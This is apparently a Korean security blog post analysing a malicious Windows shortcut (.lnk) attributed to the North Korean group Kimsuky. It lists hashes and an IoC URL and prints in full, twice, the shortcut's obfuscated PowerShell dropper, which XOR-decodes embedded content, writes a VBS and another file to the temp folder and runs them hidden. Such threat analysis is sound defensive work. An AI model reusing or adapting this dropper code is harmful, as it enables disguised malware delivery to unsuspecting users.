로그인 정보를 훔치는것 으로 추정 되는 북한 APT 김수키(Kimsuky)만든 악성코드-.lnk(2024.11.8)
Contents
오늘은 로그인 정보를 훔치는 것으로 추정되는 북한 APT 김수키(Kimsuky)만든 악성코드-. lnk(2024.11.8)에 대해 글을 적어보겠습니다.
먼저 악성코드 해시값은 다음과 같습니다.
파일명:.lnk
사이즈:5.92 KB
MD5:b7de564386ab778046b1dd3ef76e4b5e
SHA-1:baa69876baa6861db5736c58d2eded93dd1bec6e
SHA-256:e13ad0ebaac36ec363eba5760e69cb995dcae7dcc6afc01bbb31642c3c175d61
악성코드 내부 모습
StringData
{
namestring: Type: Text Document
Size: 5.23 KB
Date modified: 01/02/2020 11:23
relativepath: not present
workingdir: not present
commandlinearguments: \/c fHjk4fTLlkc5DZfyorHstui9FxC(d)6xw3Jkddddd(d)dddd
dddddfklsjjjjdjjjjjjjjjsdfjjjjjjjjjjjsdfjjjjjsdfjjjjjjjjjjjsssssssdjdddddd
dddikkkkddddddddddddddddddddddddddddd(d)ddddddddddddddddd(d)dddddddddddddd
dddddddddddkddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddd(d)ddddddddddddddddddddddd(d)dddddddddddddddddddddddddd
dddddddddddddkkkkkkkkkkkfffffffffffffffffffffffffffffffffffffffffkkkdkkkkkk
kkkkkkkk(k)kkkkkkkkddddddddddddddddddddddddddddddddddllllllllllllllleZWhdwr
piX+F4gEcRJCp5kdddddddddddddlkjsldkfjlkjlkjlkjlkjjjjjjjjjjjjjjjsdffff(f)fff
ffffffslkjlkksdflkjlknnlksnldkfjli1KXfjUxLJXU8QzW5||goto&P^(o)^w^e^R^S^h^e^
L^L -windowstyle hidden -c function getShapePath(){$l(n)kpath = G^e^t-C^hi^
ld^Item *.lnk;$lnkpath = $lnkpath^| w^he^r(e)-ob^ject {$_.length -eq 0x0000
17B5} ;$lnkpath = $lnkpath^| S^el(^)ect-O^bject -ExpandProperty Name;return
$lnkpath;} function g(e)tImgContent(){$lnkpath = getShapePath;$file = ^g^c
$lnkpath -E^nco^din^g Byte;return $file};function makepath(){$lnkpath = get
Shape(P)ath;$lnkpath = '%temp%\'+$lnkpa(t)h.substring(0,$lnkpath.length-4);
retur(n) $lnkpath};function makepath(1)(){$path1 = '%temp%(\)tmp' + (Get-Ra
ndom) + '(.)vbs';return $pa(t)h1;};function changec(o)ntent(){$file = getIm
gContent; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor
0x77 };return $file;};function s(u)bsave{$path = makepath;$bytes = changeco
ntent;$temp = $bytes ^| select -Skip 005602 ;$temp = ($temp ^|select -SkipL
ast 000460);s(c) $path ([byte[]]($)temp) -Encoding Byte;r(e)turn @($path,$(
b)ytes);};function savecontent(){$_a_res = subsav(e);$path1 = mak(e)path1;
^s^c $path1 ([byt(e)[]]($_a_res[1] ^| sele(c)t -Skip 005609)) -Encoding By
te;return @($_a_res[0],$path1);};$_a_path = savecon(t)ent;$path1 = $_a_path
[0];$path = $_a_p(a)th[1];^& $path1; ^& $path;
iconlocation: C:\Windows\System32\notepad.exe
}
코드 분석
1. 명령어 세부 사항
주어진 commandlinearguments에 포함된 긴 문자열은 코드 난독화 PowerShell을 …
먼저 악성코드 해시값은 다음과 같습니다.
파일명:.lnk
사이즈:5.92 KB
MD5:b7de564386ab778046b1dd3ef76e4b5e
SHA-1:baa69876baa6861db5736c58d2eded93dd1bec6e
SHA-256:e13ad0ebaac36ec363eba5760e69cb995dcae7dcc6afc01bbb31642c3c175d61
악성코드 내부 모습
StringData
{
namestring: Type: Text Document
Size: 5.23 KB
Date modified: 01/02/2020 11:23
relativepath: not present
workingdir: not present
commandlinearguments: \/c fHjk4fTLlkc5DZfyorHstui9FxC(d)6xw3Jkddddd(d)dddd
dddddfklsjjjjdjjjjjjjjjsdfjjjjjjjjjjjsdfjjjjjsdfjjjjjjjjjjjsssssssdjdddddd
dddikkkkddddddddddddddddddddddddddddd(d)ddddddddddddddddd(d)dddddddddddddd
dddddddddddkddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddd(d)ddddddddddddddddddddddd(d)dddddddddddddddddddddddddd
dddddddddddddkkkkkkkkkkkfffffffffffffffffffffffffffffffffffffffffkkkdkkkkkk
kkkkkkkk(k)kkkkkkkkddddddddddddddddddddddddddddddddddllllllllllllllleZWhdwr
piX+F4gEcRJCp5kdddddddddddddlkjsldkfjlkjlkjlkjlkjjjjjjjjjjjjjjjsdffff(f)fff
ffffffslkjlkksdflkjlknnlksnldkfjli1KXfjUxLJXU8QzW5||goto&P^(o)^w^e^R^S^h^e^
L^L -windowstyle hidden -c function getShapePath(){$l(n)kpath = G^e^t-C^hi^
ld^Item *.lnk;$lnkpath = $lnkpath^| w^he^r(e)-ob^ject {$_.length -eq 0x0000
17B5} ;$lnkpath = $lnkpath^| S^el(^)ect-O^bject -ExpandProperty Name;return
$lnkpath;} function g(e)tImgContent(){$lnkpath = getShapePath;$file = ^g^c
$lnkpath -E^nco^din^g Byte;return $file};function makepath(){$lnkpath = get
Shape(P)ath;$lnkpath = '%temp%\'+$lnkpa(t)h.substring(0,$lnkpath.length-4);
retur(n) $lnkpath};function makepath(1)(){$path1 = '%temp%(\)tmp' + (Get-Ra
ndom) + '(.)vbs';return $pa(t)h1;};function changec(o)ntent(){$file = getIm
gContent; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor
0x77 };return $file;};function s(u)bsave{$path = makepath;$bytes = changeco
ntent;$temp = $bytes ^| select -Skip 005602 ;$temp = ($temp ^|select -SkipL
ast 000460);s(c) $path ([byte[]]($)temp) -Encoding Byte;r(e)turn @($path,$(
b)ytes);};function savecontent(){$_a_res = subsav(e);$path1 = mak(e)path1;
^s^c $path1 ([byt(e)[]]($_a_res[1] ^| sele(c)t -Skip 005609)) -Encoding By
te;return @($_a_res[0],$path1);};$_a_path = savecon(t)ent;$path1 = $_a_path
[0];$path = $_a_p(a)th[1];^& $path1; ^& $path;
iconlocation: C:\Windows\System32\notepad.exe
}
코드 분석
1. 명령어 세부 사항
주어진 commandlinearguments에 포함된 긴 문자열은 코드 난독화 PowerShell을 …
IoC
e13ad0ebaac36ec363eba5760e69cb995dcae7dcc6afc01bbb31642c3c175d61
http://partybbq.co.kr/src/bbs/calendar/upload/up/list
http://partybbq.co.kr/src/bbs/calendar/upload/up/list